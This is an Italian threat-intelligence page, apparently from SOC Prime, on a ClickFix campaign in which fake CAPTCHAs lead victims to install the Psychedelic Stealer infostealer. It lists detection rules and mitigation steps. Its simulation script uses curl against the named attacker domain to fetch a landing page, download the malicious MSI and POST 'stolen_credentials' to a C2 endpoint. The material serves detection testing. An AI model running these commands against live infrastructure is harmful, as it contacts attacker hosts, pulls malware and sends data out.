SOC Prime Bias: High

25 Sep 2026 14:16 UTC

Il Ladro Psichedelico: Quando un CAPTCHA Diventa un Installer

Author Photo
SOC Prime Team linkedin icon Segui
Il Ladro Psichedelico: Quando un CAPTCHA Diventa un Installer
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Arctic Wolf Labs sta monitorando una campagna che utilizza false esche CAPTCHA di Cloudflare inserite in siti web aziendali ucraini compromessi. L’attacco in stile ClickFix convince gli utenti ad eseguire un pacchetto MSI che installa Psychedelic Stealer, un infostealer progettato per raccogliere credenziali del browser, token dell’account e dati di portafogli di criptovaluta. Il malware supporta anche l’esecuzione remota persistente attraverso un’infrastruttura C2 dedicata.

Indagine

L’indagine ha rivelato iframe iniettati su siti web ucraini legittimi che reindirizzano i visitatori a un flusso di verifica falso. Gli analisti hanno identificato anche un pannello di gestione delle esche marchiato Rublevka TDS, che controlla le configurazioni dei comandi e registra la telemetria dei visitatori. L’analisi tecnica del payload MSI ha rivelato un URL criptato di fase successiva insieme alle routine core del malware per furto di credenziali e dati.

Mitigazione

Le organizzazioni dovrebbero monitorare l’esecuzione sospetta di Windows Installer (msiexec.exe) lanciata da browser web o interfacce a riga di comando. Il filtro web dovrebbe bloccare i domini noti pericolosi, mentre i difensori dovrebbero anche monitorare i beni web legittimi per iniezioni iframe non autorizzate. Il rafforzamento dei controlli degli endpoint attorno alla creazione di attività programmate può ridurre ulteriormente il rischio di persistenza.

Risposta

Quando viene rilevata un’attività di Psychedelic Stealer, isolare gli endpoint colpiti per interrompere l’ulteriore esfiltrazione di dati o il movimento laterale. Eseguire una verifica dei profili dei browser e dello storage locale per credenziali compromesse, token di autenticazione e dati di portafoglio. Rivedere la telemetria di rete per possibili comunicazioni con note infrastrutture C2 e ispezionare i sistemi per attività programmate non autorizzate o host di messaggistica nativa sospetti.

Flusso di Attacco

Rilevamenti

Voce RunMRU sospetta con semantica LOLBin (tramite registry_event)

Squadra SOC Prime
25 Set 2026

Tentativo di installazione di file MSI remoto possibile (tramite cmdline)

Squadra SOC Prime
25 Set 2026

Possibile comunicazione C2 su HTTP a IP diretto con porta insolita (tramite proxy)

Squadra SOC Prime
25 Set 2026

Download di file sospetto IP diretto (tramite proxy)

Squadra SOC Prime
25 Set 2026

IOC (HashSha256) per rilevare: The Psychedelic Stealer: quando un CAPTCHA diventa un installatore

Regole AI SOC Prime
25 Set 2026

IOC (SourceIP) per rilevare: The Psychedelic Stealer: quando un CAPTCHA diventa un installatore

Regole AI SOC Prime
25 Set 2026

IOC (DestinationIP) per rilevare: The Psychedelic Stealer: quando un CAPTCHA diventa un installatore

Regole AI SOC Prime
25 Set 2026

Rilevamento dell’accesso all’infrastruttura di Psychedelic Stealer [Webserver]

Regole AI SOC Prime
25 Set 2026

Esecuzione simulata

  • Narrativa dell’attacco & Comandi: L’avversario mira a infettare un obiettivo tramite un meccanismo CAPTCHA falso. La simulazione imiterà il comportamento del browser della vittima: dapprima, navigando alla pagina di destinazione dell’attaccante per superare la prima verifica, quindi richiedendo il payload MSI dannoso e infine iniziando una connessione C2 tramite un HTTP POST allo script di controllo dell’attaccante. Questa sequenza è progettata per imitare gli esatti schemi URI identificati nell’infrastruttura di Psychedelic Stealer.

  • Script di test di regressione: Il seguente script utilizza curl per simulare le tre distinte fasi della logica di rilevamento.

    #!/bin/bash
    # Script di simulazione per l'accesso all'infrastruttura di Psychedelic Stealer
    
    TARGET_DOMAIN="uasputnik.com"
    
    echo "[+] Inizio simulazione dell'infrastruttura di Psychedelic Stealer..."
    
    # Fase 1: Simulare la visita alla pagina di destinazione (Selezione 1)
    echo "[*] Simulazione richiesta GET alla pagina di destinazione..."
    curl -s -X GET "http://$TARGET_DOMAIN/sputnik.html" -o /dev/null
    
    # Fase 2: Simulare il download del MSI dannoso (Selezione 2)
    echo "[*] Simulazione richiesta GET per il payload..."
    curl -s -X GET "http://$TARGET_DOMAIN/elita.msi" -o /dev/null
    
    # Fase 3: Simulare la comunicazione C2 tramite POST (Selezione 3)
    echo "[*] Simulazione richiesta POST all'endpoint C2..."
    curl -s -X POST "http://$TARGET_DOMAIN/admin777111777.php" -d "data=stolen_credentials" -o /dev/null
    
    echo "[+] Simulazione completa. Controllare SIEM per gli avvisi."
  • Comandi di pulizia:

    # Dato che questa è una simulazione basata sulla rete, non vengono creati file sul sistema locale 
    # a meno che non sia specificamente richiesto. Non è richiesta alcuna pulizia per il filesystem locale.
    echo "[+] Pulizia completata."